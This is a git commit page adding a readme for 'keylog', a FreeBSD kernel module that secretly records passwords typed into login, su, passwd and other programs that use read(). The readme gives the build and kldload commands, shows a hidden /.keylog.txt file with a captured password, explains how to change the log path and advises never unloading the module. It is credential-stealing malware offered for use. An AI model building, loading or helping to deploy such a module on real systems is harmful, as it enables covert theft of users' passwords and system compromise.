added keylogger
This commit is contained in:
your-favorite-hacker
48
keylog/readme.txt
Normal file
48
keylog/readme.txt
Normal file
@@ -0,0 +1,48 @@
|
||||
keylog readme
|
||||
=============
|
||||
|
||||
this module reads passwords entered via:
|
||||
- login
|
||||
- su
|
||||
- passwd
|
||||
|
||||
and all other services using read() syscall.
|
||||
tested on FreeBSD 9.3, should also run on 10.1 and others.
|
||||
|
||||
usage
|
||||
=====
|
||||
FreeBSD fbsd_default 9.3-RELEASE FreeBSD 9.3-RELEASE #0 r268512: Fri Jul 11 03:13:02 UTC 2014 root@snap.freebsd.org:/usr/obj/usr/src/sys/GENERIC i386
|
||||
|
||||
# make
|
||||
# kldload ./keylog.ko
|
||||
# kldstat
|
||||
Id Refs Address Size Name
|
||||
1 3 0xc0400000 1289f7c kernel
|
||||
2 1 0xc49ad000 2000 keylog.ko
|
||||
|
||||
|
||||
# ls -al /.keylog.txt
|
||||
-rw-r--r-- 1 root wheel 809 Jun 2 22:59 /.keylog.txt
|
||||
|
||||
(10)
|
||||
[1915]:p(112)
|
||||
[1915]:a(97)
|
||||
[1915]:s(115)
|
||||
[1915]:s(115)
|
||||
[1915]:w(119)
|
||||
[1915]:o(111)
|
||||
[1915]:r(114)
|
||||
[1915]:d(100)
|
||||
[1915]:
|
||||
(10)
|
||||
|
||||
The logfile is organized as follows: [pid]:character(character as decimal value). In this case you can see
|
||||
that the entered password, called due the login binary with process id 1915 is: 'password'.
|
||||
|
||||
If you want to change the path, go into the sourcecode and look for the variable LOGPATH.
|
||||
|
||||
Warning. Unloading the module seams to leave the kernel in a unstable state, so do not unload it ;)
|
||||
|
||||
Author
|
||||
------
|
||||
dash
|
||||
Reference in New Issue
Block a user